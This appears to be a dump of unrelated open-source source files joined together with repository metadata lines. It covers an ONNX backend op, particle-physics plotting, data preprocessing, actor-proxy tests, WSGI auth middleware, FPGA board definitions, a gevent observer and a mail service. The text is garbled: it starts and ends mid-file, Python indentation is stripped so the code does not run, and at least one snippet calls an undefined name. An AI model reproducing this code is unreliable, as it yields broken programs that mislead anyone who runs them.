@onnx_op("ConvTranspose")
@partial_support(True)
@ps_description("ConvTranspose with dilations != 1, or " +
"transposed convolution for 4D or higher " +
"are not supported in Tensorflow.")
class ConvTranspose(ConvMixin, BackendHandler):
@classmethod
def version_1(cls, node, **kwargs):
return cls.conv(node, kwargs["tensor_dict"], transpose=True)
@classmethod
def version_11(cls, node, **kwargs):
return cls.conv(node, kwargs["tensor_dict"], transpose=True)
|
PWGJE/EMCALJetTasks/Tracks/analysis/test/PlotScaledTriggered.py | maroozm/AliPhysics | 114 | 12775024 | '''
Created on 22.09.2014
@author: markusfasel
'''
from PWGJE.EMCALJetTasks.Tracks.analysis.base.Graphics import SinglePanelPlot, GraphicsObject, Style, Frame
from PWGJE.EMCALJetTasks.Tracks.analysis.correction.TriggeredSpectrumScaler import TriggeredSpectrumScaler
from PWGJE.EMCALJetTasks.Tracks.analysis.correction.SpectrumCombiner import SpectrumCombiner
from ROOT import kRed, kBlack, kBlue
class PlotScaledTriggeredToMinBias(SinglePanelPlot):
'''
classdocs
'''
def __init__(self, minbiasspectrum, triggeredSpectrum):
'''
Constructor
'''
SinglePanelPlot.__init__(self)
self.__minbiasSpectrum = GraphicsObject(minbiasspectrum, Style(kRed,25))
triggeredSpectrumMaker = TriggeredSpectrumScaler(minbiasspectrum, triggeredSpectrum)
self.__triggeredSpectrum = GraphicsObject(triggeredSpectrumMaker.GetScaledTriggeredSpectrum(), Style(kBlue, 24))
combinedSpectrumMaker = SpectrumCombiner(minbiasspectrum, self.__triggeredSpectrum.GetData())
self.__combinedSpectrum = GraphicsObject(combinedSpectrumMaker.MakeCombinedSpectrum(50.), Style(kBlack, 20))
self.__labeltext = None
def SetLabel(self, label):
self.__labeltext = label
def Create(self):
self._OpenCanvas("triggerSpectrumScalerPlot", "Compare scaled trigger to minbias")
pad = self._GetFramedPad()
#pad.GetPad().SetLogx()
pad.GetPad().SetLogy()
frame = Frame("framecomp", 0.1, 100, 1e-10, 2)
frame.SetXtitle("p_{t} (GeV/c)")
frame.SetYtitle("1/N_{ev} dN/dp_{t} ((GeV/c)^{-1})")
pad.DrawFrame(frame)
pad.DrawGraphicsObject(self.__combinedSpectrum, True, "Combined")
pad.DrawGraphicsObject(self.__minbiasSpectrum, True, "MinBias")
pad.DrawGraphicsObject(self.__triggeredSpectrum, True, "Triggered")
pad.CreateLegend(0.55, 0.75, 0.89, 0.89)
if self.__labeltext:
pad.CreateLabel(0.15, 0.15, 0.45, 0.2, self.__labeltext)
|
Chapter14/data_preprocessing.py | andriitugai/Learning-Python-data-structures | 202 | 12775072 |
import numpy as np
import pandas
from sklearn.preprocessing import MinMaxScaler, StandardScaler, Binarizer
#handle the missing values
data = pandas.DataFrame([
[4., 45., 984.],
[np.NAN, np.NAN, 5.],
[94., 23., 55.],
])
#print original data
print(data)
#fill the missing values with the constant 0.1
print(data.fillna(0.1))
#fill the missing values with the mean
print(data.fillna(data.mean()))
#Data normalization
data1 = pandas.DataFrame([[ 58., 1., 43.],
[ 10., 200., 65.],
[ 20. , 75. , 7.]])
#scaling with min-max scaler
scaled_values = MinMaxScaler(feature_range=(0,1))
results = scaled_values.fit(data1).transform(data1)
print(results)
#scaling with the standard scaling
stand_scalar = StandardScaler().fit(data1)
results = stand_scalar.transform(data1)
print(results)
#normalization using binarization
results = Binarizer(50.0).fit(data1).transform(data1)
print(results)
|
test/EN.py | miaopei/deep_landmark | 327 | 12775102 | <reponame>miaopei/deep_landmark
#!/usr/bin/env python2.7
# coding: utf-8
"""
This file use Caffe model to predict landmarks and evaluate the mean error.
"""
import os, sys
import time
import cv2
import numpy as np
from numpy.linalg import norm
from common import getDataFromTxt, logger, processImage, getCNNs
TXT = 'dataset/train/testImageList.txt'
template = '''################## Summary #####################
Test Number: %d
Time Consume: %.03f s
FPS: %.03f
LEVEL - %d
Mean Error:
Left Eye = %f
Right Eye = %f
Nose = %f
Failure:
Left Eye = %f
Right Eye = %f
Nose = %f
'''
def evaluateError(landmarkGt, landmarkP, bbox):
e = np.zeros(3)
for i in range(3):
e[i] = norm(landmarkGt[i] - landmarkP[i])
e = e / bbox.w
print 'landmarkGt'
print landmarkGt
print 'landmarkP'
print landmarkP
print 'error', e
return e
def EN(img, bbox):
"""
LEVEL-1, EN
img: gray image
bbox: bounding box of face
"""
bbox = bbox.expand(0.05)
face = img[bbox.top:bbox.bottom+1,bbox.left:bbox.right+1]
face = cv2.resize(face, (39, 39)).reshape((1, 1, 39, 39))
face = processImage(face)
F, EN, NM = getCNNs(level=1) # TODO more flexible load needed.
landmark = EN.forward(face[:, :, :31, :])
return landmark
def E():
data = getDataFromTxt(TXT)
error = np.zeros((len(data), 3))
for i in range(len(data)):
imgPath, bbox, landmarkGt = data[i]
landmarkGt = landmarkGt[:3, :]
img = cv2.imread(imgPath, cv2.CV_LOAD_IMAGE_GRAYSCALE)
assert(img is not None)
logger("process %s" % imgPath)
landmarkP = EN(img, bbox)
# real landmark
landmarkP = bbox.reprojectLandmark(landmarkP)
landmarkGt = bbox.reprojectLandmark(landmarkGt)
error[i] = evaluateError(landmarkGt, landmarkP, bbox)
return error
if __name__ == '__main__':
t = time.clock()
error = E()
t = time.clock() - t
N = len(error)
fps = N / t
errorMean = error.mean(0)
# failure
failure = np.zeros(3)
threshold = 0.05
for i in range(3):
failure[i] = float(sum(error[:, i] > threshold)) / N
# log string
s = template % (N, t, fps, 1, errorMean[0], errorMean[1], errorMean[2], \
failure[0], failure[1], failure[2])
print s
logfile = 'log/1_EN_test.log'
with open(logfile, 'w') as fd:
fd.write(s)
|
mistral/scheduler/scheduler_server.py | soda-research/mistral | 205 | 12775116 | <reponame>soda-research/mistral
# Copyright 2018 - Nokia Networks.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_config import cfg
from oslo_log import log as logging
from mistral.rpc import base as rpc
from mistral.service import base as service_base
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class SchedulerServer(service_base.MistralService):
"""Scheduler server.
Manages scheduler life-cycle and gets registered as an RPC
endpoint to process scheduler specific calls.
"""
def __init__(self, scheduler, setup_profiler=True):
super(SchedulerServer, self).__init__(
'scheduler_group',
setup_profiler
)
self.scheduler = scheduler
self._rpc_server = None
def start(self):
super(SchedulerServer, self).start()
self._rpc_server = rpc.get_rpc_server_driver()(cfg.CONF.engine)
self._rpc_server.register_endpoint(self)
self._rpc_server.run()
self._notify_started('Scheduler server started.')
def stop(self, graceful=False):
super(SchedulerServer, self).stop()
if self._rpc_server:
self._rpc_server.stop(graceful)
def schedule(self, rpc_ctx, job):
"""Receives requests over RPC to schedule delayed calls.
:param rpc_ctx: RPC request context.
:param job: Scheduler job.
"""
LOG.info("Received RPC request 'schedule'[job=%s]", job)
return self.scheduler.schedule(job, allow_redistribute=False)
|
migen/fomu.py | Freax13/fomu-workshop | 127 | 12775131 | <filename>migen/fomu.py
""" Fomu board definitions (mapping of I/O pins, clock, etc.) """
from migen import *
from migen.build.generic_platform import *
from migen.build.lattice import LatticePlatform
class FomuPvtPlatform(LatticePlatform):
""" Based on
https://github.com/litex-hub/litex-boards/blob/master/litex_boards/partner/platforms/fomu_pvt.py """
_io = [
('clk48', 0, Pins('F4'), IOStandard('LVCMOS33')),
('user_led_n', 0, Pins('A5'), IOStandard('LVCMOS33')),
('rgb_led', 0,
Subsignal('r', Pins('C5')),
Subsignal('g', Pins('B5')),
Subsignal('b', Pins('A5')),
IOStandard('LVCMOS33')),
('user_touch_n', 0, Pins('E4'), IOStandard('LVCMOS33')),
('user_touch_n', 1, Pins('D5'), IOStandard('LVCMOS33')),
('user_touch_n', 2, Pins('E5'), IOStandard('LVCMOS33')),
('user_touch_n', 3, Pins('F5'), IOStandard('LVCMOS33')),
('usb', 0,
Subsignal('d_p', Pins('A1')),
Subsignal('d_n', Pins('A2')),
Subsignal('pullup', Pins('A4')),
IOStandard('LVCMOS33'))
]
_connectors = [
('touch_pins', 'E4 D5 E5 F5')
]
default_clk_name = 'clk48'
default_clk_period = 1e9 / 48e6
def __init__(self):
LatticePlatform.__init__(self,
'ice40-up5k-uwg30',
self._io,
self._connectors,
toolchain='icestorm')
def create_programmer(self):
return IceStormProgrammer()
class FomuHackerPlatform(LatticePlatform):
""" Based on
https://github.com/litex-hub/litex-boards/blob/master/litex_boards/partner/platforms/fomu_hacker.py """
_io = [
('clk48', 0, Pins('F5'), IOStandard('LVCMOS33')),
('user_led_n', 0, Pins('A5'), IOStandard('LVCMOS33')),
('rgb_led', 0,
Subsignal('r', Pins('C5')),
Subsignal('g', Pins('B5')),
Subsignal('b', Pins('A5')),
IOStandard('LVCMOS33')),
('user_touch_n', 0, Pins('F4'), IOStandard('LVCMOS33')),
('user_touch_n', 1, Pins('E5'), IOStandard('LVCMOS33')),
('user_touch_n', 2, Pins('E4'), IOStandard('LVCMOS33')),
('user_touch_n', 3, Pins('F2'), IOStandard('LVCMOS33')),
('usb', 0,
Subsignal('d_p', Pins('A4')),
Subsignal('d_n', Pins('A2')),
Subsignal('pullup', Pins('D5')),
IOStandard('LVCMOS33'))
]
_connectors = [
('touch_pins', 'F4 E5 E4 F2')
]
default_clk_name = 'clk48'
default_clk_period = 1e9 / 48e6
def __init__(self):
LatticePlatform.__init__(self,
'ice40-up5k-uwg30',
self._io,
self._connectors,
toolchain='icestorm')
def create_programmer(self):
return IceStormProgrammer()
class FomuEvt2Platform(LatticePlatform):
""" Based on
https://github.com/litex-hub/litex-boards/blob/master/litex_boards/partner/platforms/fomu_evt.py """
_io = [
('clk48', 0, Pins('44'), IOStandard('LVCMOS33')),
('user_led_n', 0, Pins('41'), IOStandard('LVCMOS33')),
('rgb_led', 0,
Subsignal('r', Pins('40')),
Subsignal('g', Pins('39')),
Subsignal('b', Pins('41')),
IOStandard('LVCMOS33')),
('user_touch_n', 0, Pins('48'), IOStandard('LVCMOS33')),
('user_touch_n', 1, Pins('47'), IOStandard('LVCMOS33')),
('user_touch_n', 2, Pins('46'), IOStandard('LVCMOS33')),
('user_touch_n', 3, Pins('45'), IOStandard('LVCMOS33')),
('usb', 0,
Subsignal('d_p', Pins('34')),
Subsignal('d_n', Pins('37')),
Subsignal('pullup', Pins('35')),
Subsignal('pulldown', Pins('36')),
IOStandard('LVCMOS33'))
]
_connectors = [
('touch_pins', '48 47 46 45')
]
default_clk_name = 'clk48'
default_clk_period = 1e9 / 48e6
def __init__(self):
LatticePlatform.__init__(self,
'ice40-up5k-sg48',
self._io,
self._connectors,
toolchain='icestorm')
def create_programmer(self):
return IceStormProgrammer()
FomuEvt3Platform = FomuEvt2Platform
|
tests/proxy/test_proxy.py | jodal/pykka | 796 | 12775151 | <filename>tests/proxy/test_proxy.py
import pytest
import pykka
from pykka import ActorDeadError, ActorProxy
class NestedObject:
pass
@pytest.fixture(scope="module")
def actor_class(runtime):
class ActorForProxying(runtime.actor_class):
a_nested_object = pykka.traversable(NestedObject())
a_class_attr = "class_attr"
def __init__(self):
super(runtime.actor_class, self).__init__()
self.an_instance_attr = "an_instance_attr"
def a_method(self):
pass
return ActorForProxying
@pytest.fixture
def proxy(actor_class):
proxy = ActorProxy(actor_class.start())
yield proxy
proxy.stop()
def test_eq_to_self(proxy):
assert proxy == proxy
def test_is_hashable(proxy):
assert hash(proxy) == hash(proxy)
def test_eq_to_another_proxy_for_same_actor_and_attr_path(proxy):
proxy2 = proxy.actor_ref.proxy()
assert proxy == proxy2
def test_not_eq_to_proxy_with_different_attr_path(proxy):
assert proxy != proxy.a_nested_object
def test_repr_is_wrapped_in_lt_and_gt(proxy):
result = repr(proxy)
assert result.startswith("<")
assert result.endswith(">")
def test_repr_reveals_that_this_is_a_proxy(proxy):
assert "ActorProxy" in repr(proxy)
def test_repr_contains_actor_class_name(proxy):
assert "ActorForProxying" in repr(proxy)
def test_repr_contains_actor_urn(proxy):
assert proxy.actor_ref.actor_urn in repr(proxy)
def test_repr_contains_attr_path(proxy):
assert "a_nested_object" in repr(proxy.a_nested_object)
def test_str_contains_actor_class_name(proxy):
assert "ActorForProxying" in str(proxy)
def test_str_contains_actor_urn(proxy):
assert proxy.actor_ref.actor_urn in str(proxy)
def test_dir_on_proxy_lists_attributes_of_the_actor(proxy):
result = dir(proxy)
assert "a_class_attr" in result
assert "an_instance_attr" in result
assert "a_method" in result
def test_dir_on_proxy_lists_private_attributes_of_the_proxy(proxy):
result = dir(proxy)
assert "__class__" in result
assert "__dict__" in result
assert "__getattr__" in result
assert "__setattr__" in result
def test_refs_proxy_method_returns_a_proxy(actor_class):
proxy_from_ref_proxy = actor_class.start().proxy()
assert isinstance(proxy_from_ref_proxy, ActorProxy)
proxy_from_ref_proxy.stop().get()
def test_proxy_constructor_raises_exception_if_actor_is_dead(actor_class):
actor_ref = actor_class.start()
actor_ref.stop()
with pytest.raises(ActorDeadError) as exc_info:
ActorProxy(actor_ref)
assert str(exc_info.value) == f"{actor_ref} not found"
def test_actor_ref_may_be_retrieved_from_proxy_if_actor_is_dead(proxy):
proxy.actor_ref.stop()
assert not proxy.actor_ref.is_alive()
def test_actor_proxy_does_not_expose_proxy_to_self(runtime, log_handler):
class Actor(runtime.actor_class):
def __init__(self):
super().__init__()
self.self_proxy = self.actor_ref.proxy()
self.foo = "bar"
actor_ref = Actor.start()
try:
proxy = actor_ref.proxy()
assert proxy.foo.get() == "bar"
with pytest.raises(AttributeError, match="has no attribute 'self_proxy'"):
proxy.self_proxy.foo.get()
finally:
actor_ref.stop()
log_handler.wait_for_message("warning")
with log_handler.lock:
assert len(log_handler.messages["warning"]) == 2
log_record = log_handler.messages["warning"][0]
assert (
"attribute 'self_proxy' is a proxy to itself. "
"Consider making it private by renaming it to '_self_proxy'."
) in log_record.getMessage()
|
third_party/Paste/paste/auth/multi.py | tingshao/catapult | 5,079 | 12775162 | # (c) 2005 <NAME>
# This module is part of the Python Paste Project and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
# This code was written with funding by http://prometheusresearch.com
"""
Authentication via Multiple Methods
In some environments, the choice of authentication method to be used
depends upon the environment and is not "fixed". This middleware allows
N authentication methods to be registered along with a goodness function
which determines which method should be used. The following example
demonstrates how to use both form and digest authentication in a server
stack; by default it uses form-based authentication unless
``*authmeth=digest`` is specified as a query argument.
>>> from paste.auth import form, cookie, digest, multi
>>> from paste.wsgilib import dump_environ
>>> from paste.httpserver import serve
>>>
>>> multi = multi.MultiHandler(dump_environ)
>>> def authfunc(environ, realm, user):
... return digest.digest_password(realm, user, user)
>>> multi.add_method('digest', digest.middleware, "Test Realm", authfunc)
>>> multi.set_query_argument('digest')
>>>
>>> def authfunc(environ, username, password):
... return username == password
>>> multi.add_method('form', form.middleware, authfunc)
>>> multi.set_default('form')
>>> serve(cookie.middleware(multi))
serving on...
"""
class MultiHandler(object):
"""
Multiple Authentication Handler
This middleware provides two othogonal facilities:
- a manner to register any number of authentication middlewares
- a mechanism to register predicates which cause one of the
registered middlewares to be used depending upon the request
If none of the predicates returns True, then the application is
invoked directly without middleware
"""
def __init__(self, application):
self.application = application
self.default = application
self.binding = {}
self.predicate = []
def add_method(self, name, factory, *args, **kwargs):
self.binding[name] = factory(self.application, *args, **kwargs)
def add_predicate(self, name, checker):
self.predicate.append((checker, self.binding[name]))
def set_default(self, name):
""" set default authentication method """
self.default = self.binding[name]
def set_query_argument(self, name, key = '*authmeth', value = None):
""" choose authentication method based on a query argument """
lookfor = "%s=%s" % (key, value or name)
self.add_predicate(name,
lambda environ: lookfor in environ.get('QUERY_STRING',''))
def __call__(self, environ, start_response):
for (checker, binding) in self.predicate:
if checker(environ):
return binding(environ, start_response)
return self.default(environ, start_response)
middleware = MultiHandler
__all__ = ['MultiHandler']
if "__main__" == __name__:
import doctest
doctest.testmod(optionflags=doctest.ELLIPSIS)
|
src/pipelinex/extras/ops/allennlp_ops.py | MarchRaBBiT/pipelinex | 188 | 12775174 | class AllennlpReaderToDict:
def __init__(self, **kwargs):
self.kwargs = kwargs
def __call__(self, *args_ignore, **kwargs_ignore):
kwargs = self.kwargs
reader = kwargs.get("reader")
file_path = kwargs.get("file_path")
n_samples = kwargs.get("n_samples")
instances = reader._read(file_path)
n_samples = n_samples or len(instances)
d = dict()
i = 0
for instance in instances:
if n_samples and i >= n_samples:
break
d[i] = instance.fields
i += 1
return d
|
L1Trigger/TrackTrigger/python/TTStubAlgorithmRegister_cfi.py | ckamtsikis/cmssw | 852 | 12775177 | import FWCore.ParameterSet.Config as cms
# First register all the hit matching algorithms, then specify preferred ones at end.
# The stub windows used has been optimized for for PU200 events
# We use by default the tight tuning
#
# Definition is presented here:
#
# https://indico.cern.ch/event/681577/#4-update-of-the-track-trigger
#
# This script is adapted to the very last Tilted Tracker geometry to date (tracker T5)
# This version was tested on CMSSW 10_0_0_pre1
#
TTStubAlgorithm_official_Phase2TrackerDigi_ = cms.ESProducer("TTStubAlgorithm_official_Phase2TrackerDigi_",
zMatchingPS = cms.bool(True),
zMatching2S = cms.bool(True),
#Number of tilted rings per side in barrel layers (for tilted geom only)
NTiltedRings = cms.vdouble( 0., 12., 12., 12., 0., 0., 0.),
# PU200 tight tuning, optimized for muons
BarrelCut = cms.vdouble( 0, 2, 2.5, 3.5, 4.5, 5.5, 7),
TiltedBarrelCutSet = cms.VPSet(
cms.PSet( TiltedCut = cms.vdouble( 0 ) ),
cms.PSet( TiltedCut = cms.vdouble( 0, 3, 3, 2.5, 3, 3, 2.5, 2.5, 2, 1.5, 1.5, 1, 1) ),
cms.PSet( TiltedCut = cms.vdouble( 0, 3.5, 3, 3, 3, 3, 2.5, 2.5, 3, 3, 2.5, 2.5, 2.5) ),
cms.PSet( TiltedCut = cms.vdouble( 0, 4, 4, 4, 3.5, 3.5, 3.5, 3.5, 3, 3, 3, 3, 3) ),
),
EndcapCutSet = cms.VPSet(
cms.PSet( EndcapCut = cms.vdouble( 0 ) ),
cms.PSet( EndcapCut = cms.vdouble( 0, 1, 2.5, 2.5, 3, 2.5, 3, 3.5, 4, 4, 4.5, 3.5, 4, 4.5, 5, 5.5) ),
cms.PSet( EndcapCut = cms.vdouble( 0, 0.5, 2.5, 2.5, 3, 2.5, 3, 3, 3.5, 3.5, 4, 3.5, 3.5, 4, 4.5, 5) ),
cms.PSet( EndcapCut = cms.vdouble( 0, 1, 3, 3, 2.5, 3.5, 3.5, 3.5, 4, 3.5, 3.5, 4, 4.5) ),
cms.PSet( EndcapCut = cms.vdouble( 0, 1, 2.5, 3, 2.5, 3.5, 3, 3, 3.5, 3.5, 3.5, 4, 4) ),
cms.PSet( EndcapCut = cms.vdouble( 0, 0.5, 1.5, 3, 2.5, 3.5, 3, 3, 3.5, 4, 3.5, 4, 3.5) ),
)
# PU200 loose tuning, optimized for robustness (uncomment if you want to use it)
#BarrelCut = cms.vdouble( 0, 2.0, 3, 4.5, 6, 6.5, 7.0),
#TiltedBarrelCutSet = cms.VPSet(
# cms.PSet( TiltedCut = cms.vdouble( 0 ) ),
# cms.PSet( TiltedCut = cms.vdouble( 0, 3, 3., 2.5, 3., 3., 2.5, 2.5, 2., 1.5, 1.5, 1, 1) ),
# cms.PSet( TiltedCut = cms.vdouble( 0, 4., 4, 4, 4, 4., 4., 4.5, 5, 4., 3.5, 3.5, 3) ),
# cms.PSet( TiltedCut = cms.vdouble( 0, 5, 5, 5, 5, 5, 5, 5.5, 5, 5, 5.5, 5.5, 5.5) ),
# ),
#EndcapCutSet = cms.VPSet(
# cms.PSet( EndcapCut = cms.vdouble( 0 ) ),
# cms.PSet( EndcapCut = cms.vdouble( 0, 1., 2.5, 2.5, 3.5, 5.5, 5.5, 6, 6.5, 6.5, 6.5, 6.5, 6.5, 6.5, 7, 7) ),
# cms.PSet( EndcapCut = cms.vdouble( 0, 0.5, 2.5, 2.5, 3, 5, 6, 6, 6.5, 6.5, 6.5, 6.5, 6.5, 6.5, 7, 7) ),
# cms.PSet( EndcapCut = cms.vdouble( 0, 1, 3., 4.5, 6., 6.5, 6.5, 6.5, 7, 7, 7, 7, 7) ),
# cms.PSet( EndcapCut = cms.vdouble( 0, 1., 2.5, 3.5, 6., 6.5, 6.5, 6.5, 6.5, 7, 7, 7, 7) ),
# cms.PSet( EndcapCut = cms.vdouble( 0, 0.5, 1.5, 3., 4.5, 6.5, 6.5, 7, 7, 7, 7, 7, 7) ),
# )
)
# CBC3 hit matching algorithm
TTStubAlgorithm_cbc3_Phase2TrackerDigi_ = cms.ESProducer("TTStubAlgorithm_cbc3_Phase2TrackerDigi_",
zMatchingPS = cms.bool(True),
zMatching2S = cms.bool(True),
)
# Set the preferred hit matching algorithms.
# We prefer the global geometry algorithm for now in order not to break
# anything. Override with process.TTStubAlgorithm_PSimHit_ = ...,
# etc. in your configuration.
TTStubAlgorithm_Phase2TrackerDigi_ = cms.ESPrefer("TTStubAlgorithm_official_Phase2TrackerDigi_")
|
recipes/Python/577491_Observer_Design_Pattern_pythgevent_coroutine/recipe-577491.py | tdiprima/code | 2,023 | 12775188 | __author__ = "<NAME>"
__email__ = "<EMAIL>"
import gevent
from gevent import core
from gevent.hub import getcurrent
from gevent.event import Event
from gevent.pool import Pool
import functools
def wrap(method, *args, **kargs):
if method is None:
return None
if args or kargs:
method = functools.partial(method, *args, **kargs)
def wrapper(*args, **kargs):
return method(*args, **kargs)
return wrapper
class FiredEvent(Exception):
pass
class Event(object):
def __init__(self,events,name,callback):
self.events = events
self.name = name.lower()
self.callback = callback
def unsubscribe(self):
if not self.events._events.has_key(self.name):
return False
try:
del self.events._events[self.name][self.events._events[self.name].index(self)]
except:
pass
return True
def cancel(self):
self.unsubscribe()
def run(self):
gevent.spawn(self.callback)
def __del__(self):
self.unsubscribe()
class Observer(object):
def __new__(cls,*args):
if not hasattr(cls,'_instance'):
cls._instance = object.__new__(cls)
cls._instance._events = {}
return cls._instance
def subscribe(self,name,callback):
if not self._events.has_key(name.lower()):
self._events[name] = []
ev = Event(self,name,callback)
self._events[name].append(ev)
return ev
def fire(self,name):
try:
ev = self._events[name.lower()].pop(0)
except:
return False
while ev:
gevent.spawn(ev.run)
try:
ev = self._events[name.lower()].pop(0)
except:
break
return True
def wait(self,name):
if not self._events.has_key(name.lower()):
self._events[name] = []
ev = Event(self,name,wrap(getcurrent().throw,FiredEvent))
self._events[name].append(ev)
return ev
if __name__ == '__main__':
# Testing
def in_another_greenlet():
print '001',getcurrent()
def test_subscribe():
e = Observer()
print '000',getcurrent()
getcurrent().in_another_greenlet = in_another_greenlet
b = e.subscribe('kill',getcurrent().in_another_greenlet)
gevent.sleep(5)
print 'END'
b.unsubscribe()
def test_wait():
e = Observer()
ev = e.wait('kill')
try:
gevent.sleep(3)
except FiredEvent:
print 'Fired!'
else:
print 'Not Fired!'
finally:
ev.cancel()
def fire_event():
e2 = Observer()
gevent.sleep(2)
e2.fire('kill')
p = Pool()
p.spawn(test_wait)
p.spawn(test_subscribe)
p.spawn(fire_event)
p.join()
|
canopen/sdo/__init__.py | mlederhi/canopen | 301 | 12775189 | <gh_stars>100-1000
from .base import Variable, Record, Array
from .client import SdoClient
from .server import SdoServer
from .exceptions import SdoAbortedError, SdoCommunicationError
|
kansha/services/mail.py | AnomalistDesignLLC/kansha | 161 | 12775215 | <gh_stars>100-1000
# -*- coding:utf-8 -*-
#--
# Copyright (c) 2012-2014 Net-ng.
# All rights reserved.
#
# This software is licensed under the BSD License, as described in
# the file LICENSE.txt, which you should have received as part of
# this distribution.
#--
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.Utils import COMMASPACE, formatdate
from nagare import log
from .services_repository import Service
class MailSender(Service):
'''
Mail sender service.
API.
A mail sender service must provide a send method:
'''
LOAD_PRIORITY = 10
CONFIG_SPEC = {
'activated': 'boolean(default=True)',
'host': 'string(default="127.0.0.1")',
'port': 'integer(default=25)',
'default_sender': 'string(default="<EMAIL>")'
}
def __init__(self, config_filename, error, host, port, default_sender, activated):
super(MailSender, self).__init__(config_filename, error)
self.host = host
self.port = port
self.default_sender = default_sender
self.activated = activated
if self.activated:
log.debug(
'The mail service will connect to %s on port %s' %
(self.host, self.port)
)
else:
log.warning('The mail service will drop all messages!')
def _smtp_send(self, from_, to, contents):
try:
smtp = smtplib.SMTP(self.host, self.port)
except IOError as e:
log.exception(e)
return False
try:
smtp.sendmail(from_, to, contents)
except Exception as e:
log.exception(e)
return False
finally:
smtp.close()
return True
def send(self, subject, to, content, html_content=None, from_='', cc=[], bcc=[],
type='plain', mpart_type='alternative'):
"""Sends an email
In:
- ``subject`` -- email subject
- ``to`` -- list of recipients' emails
- ``content`` -- email content
- ``from_`` -- email sender adress
- ``cc`` -- list of CC emails
- ``bcc`` -- list of BCC emails
- ``type`` -- email type ('plain' or 'html')
- ``mpart_type`` -- email part type
"""
from_ = from_ if from_ else self.default_sender
# create the message envelop
msg = MIMEMultipart(mpart_type)
msg['Subject'] = subject
msg['Date'] = formatdate(localtime=True)
msg['From'] = from_
msg['To'] = COMMASPACE.join(to)
if cc:
msg['Cc'] = COMMASPACE.join(cc)
# attach the mail content
charset = 'us-ascii'
if isinstance(content, unicode):
content = content.encode('UTF-8')
charset = 'UTF-8'
msg.attach(MIMEText(content, type, charset))
if html_content:
msg.attach(MIMEText(html_content, 'html', charset))
# log
log.info('%s mail:\n subject=%s\n from=%s\n to=%s\n cc=%s\n bcc=%s',
'sending' if self.activated else 'ignoring', subject, from_, to, cc, bcc)
log.debug('Mail content:\n' + content)
# post the email to the SMTP server
if self.activated:
return self._smtp_send(from_, to + cc + bcc, msg.as_string())
return True
class DummyMailSender(MailSender):
'''For use in unit tests.'''
def __init__(self):
super(DummyMailSender, self).__init__(
'',
None,
host='localhost',
port=25,
activated=False,
default_sender='<EMAIL>'
)
|
tests/components/opnsense/__init__.py | domwillcode/home-assistant | 30,023 | 12775241 | """Tests for the opnsense component."""
|
recipes/Python/577218_Sphere/recipe-577218.py | tdiprima/code | 2,023 | 12775243 | <gh_stars>1000+
#On the name of ALLAH and may the blessing and peace of Allah
#be upon the Messenger of Allah <NAME>.
#Author : <NAME>
#Date : 06/05/10
#version :2.6
"""
Sphere class represents a geometric sphere and a completing_the_squares
function is used for the purpose, while an utility _checksign function
is used to check the sign of all the coefficients and return an empty string
for a positive number and a minus character for a negative number.
A string representation function for the three different outcome
possibilities is used to print the solution of the sphere equation.
"""
from math import sqrt
class Sphere(object):
"""
class that represents a geometric Sphere
"""
def __init__(self,coef_A = 0,coef_B = 0, coef_C = 0, coef_D= 0, coef_E = 0, coef_F = 0, coef_G = 0):
""" Sphere Construction takes coef_A,coef_B,coef_C,coef_D,coef_E,coef_F,coef_G constants """
self._A = coef_A
self._B = coef_B
self._C = coef_C
self._D = coef_D
self._E = coef_E
self._F = coef_F
self._G = coef_G
self._a = self._checkSign(self._D)
self._b = self._checkSign(self._E)
self._c = self._checkSign(self._F)
self._d = pow((self._D/2.0)/self._A,2)
self._e = pow((self._E/2.0)/self._B,2)
self._f = pow((self._F/2.0)/self._C,2)
self._g = chr(253)
self._h = (-self._G/self._A + self._d + self._e + self._f)
def _checkSign(self,value):
""" Utility method to check the values' sign
and return a sign string"""
if value >= 0:
return "+"
else :
return ""
def completing_the_squares(self):
"""
completing the squares function
"""
c_squares = "(x%s %s%sx + %s) + (y%s %s%sy + %s) + (z%s %s%sz + %s) = %s" % \
(self._g,self._a,self._D/self._A,self._d,
self._g,self._b,self._E/self._B,self._e,
self._g,self._c,self._F/self._C,self._f,self._h)
return c_squares
def __str__(self):
"""
String representation of a sphere
"""
print ("\n(x%s%s)%s + (y%s%s)%s + (z%s%s)%s = %s") % \
(self._a,(self._D/2.0)/self._A,self._g,self._b,(self._E/2.0)/self._B,
self._g,self._c,(self._F/2.0)/self._C,self._g,self._h)
if self._h > 0:
return "\n<The graph of this equation is a sphere with centre (%s,%s,%s) and radius %s\n" % \
(-1*self._D/2.0,-1*self._E/2.0,-1*self._F/2.0,"%2.3f" % (sqrt(self._h)))
elif self._h == 0:
return "\n<this sphere has radius = 0 and the graph is a single point(%s,%s,%s)\n " % \
(-1*self._D/2.0,-1*self._E/2.0,-1*self._F/2.0,float(m.sqrt(self._h)))
else :
return "\n<There is no graph for such equation "
if __name__ == "__main__":
sphere = Sphere(1,1,1,-2,-4,8,17)
print sphere.completing_the_squares()
print sphere
sphere1 = Sphere(1,1,1,10,4,2,-19)
print sphere1.completing_the_squares()
print sphere1
sphere2 = Sphere(2,2,2,-2,-3,5,-2)
print sphere2.completing_the_squares()
print sphere2
####C:\Windows\python "C:\Users\MyComputer\Documents\Pyt\Sphere7.py"
#(x² -2x + 1.0) + (y² -4y + 4.0) + (z² +8z + 16.0) = 4.0
#(x-1.0)² + (y-2.0)² + (z+4.0)² = 4.0
#<The graph of this equation is a sphere with centre (1.0,2.0,-4.0) #and radius 2.000
#(x² +10x + 25.0) + (y² +4y + 4.0) + (z² +2z + 1.0) = 49.0
#(x+5.0)² + (y+2.0)² + (z+1.0)² = 49.0
#<The graph of this equation is a sphere with centre (-5.0,-2.0,-1.0) #and radius 7.000
#(x² -1x + 0.25) + (y² -2y + 0.5625) + (z² +2z + 1.5625) = 3.375
#(x-0.5)² + (y-0.75)² + (z+1.25)² = 3.375
#<The graph of this equation is a sphere with centre (1.0,1.5,-2.5) #and radius 1.837
#################################################################
|
app_config.py | huhansan666666/flask_reddit | 461 | 12775248 | #!/usr/bin/env python2.7
"""
app_config.py will be storing all the module configs.
Here the db uses mysql.
